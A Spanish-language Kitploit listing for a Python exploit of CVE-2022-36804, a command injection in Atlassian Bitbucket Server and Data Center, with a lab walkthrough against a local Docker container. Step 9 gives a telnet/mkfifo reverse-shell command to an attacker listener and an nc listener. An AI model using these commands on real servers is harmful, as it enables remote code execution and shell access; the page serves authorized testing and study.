Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-36804 — Exploit en Python para CVE-2022-36804, una inyección de comandos en Atlassian Bitbucket Server y Data Center, que permite ejecución remota de código con permisos de lectura. | Kitploit
Herramientas/GitHubGitHub/asepsaepdin/cve-2022-36804
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

Exploit en Python para CVE-2022-36804, una inyección de comandos en Atlassian Bitbucket Server y Data Center, que permite ejecución remota de código con permisos de lectura.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-36804 - Vulnerabilidad de Inyección de Comandos en Atlassian Bitbucket Server y Data Center

Python


⚠️ Solo con fines educativos y de investigación de seguridad autorizada

Autores del Exploit Original

Muy agradecido al autor original del PoC Walnut Security Services Pvt. Ltd

Descripción

Varios endpoints de API en Atlassian Bitbucket Server y Data Center 7.0.0 antes de la versión 7.6.17, desde la versión 7.7.0 antes de la versión 7.17.10, desde la versión 7.18.0 antes de la versión 7.21.4, desde la versión 8.0.0 antes de la versión 8.0.3, desde la versión 8.1.0 antes de la versión 8.1.3, y desde la versión 8.2.0 antes de la versión 8.2.2, y desde la versión 8.3.0 antes de 8.3.1 permite a atacantes remotos con permisos de lectura en un repositorio público o privado de Bitbucket ejecutar código arbitrario mediante el envío de una solicitud HTTP maliciosa. Esta vulnerabilidad fue reportada a través de nuestro Programa de Bug Bounty por TheGrandPew.


Guía Paso a Paso

  1. Primero, clona el repositorio

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. Cambia de directorio

    root@kitploit:~
    cd CVE-2022-36804
    
  3. Construye el contenedor vulnerable

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  4. Ejecuta el contenedor efímero

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. Verifica la dirección IP del contenedor

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. Configura Atlassian Bitbucket y crea un nuevo repositorio público abriendo la URL: http://172.17.0.3:7990

  7. Verifica la Ejecución Remota de Código (RCE)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. Verifica RCE con un comando personalizado (cmd)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. Desde la perspectiva de un atacante, la ejecución remota de código es crítica para obtener acceso a un shell interactivo. Por lo tanto, ejecutar el siguiente comando activaría una reverse shell de telnet sobre TCP basada en bash hacia el sistema del atacante en el puerto 4444/tcp:

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    
    root@kitploit:~
    nc -nlvp 4444
    

Créditos

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
Descargar herramienta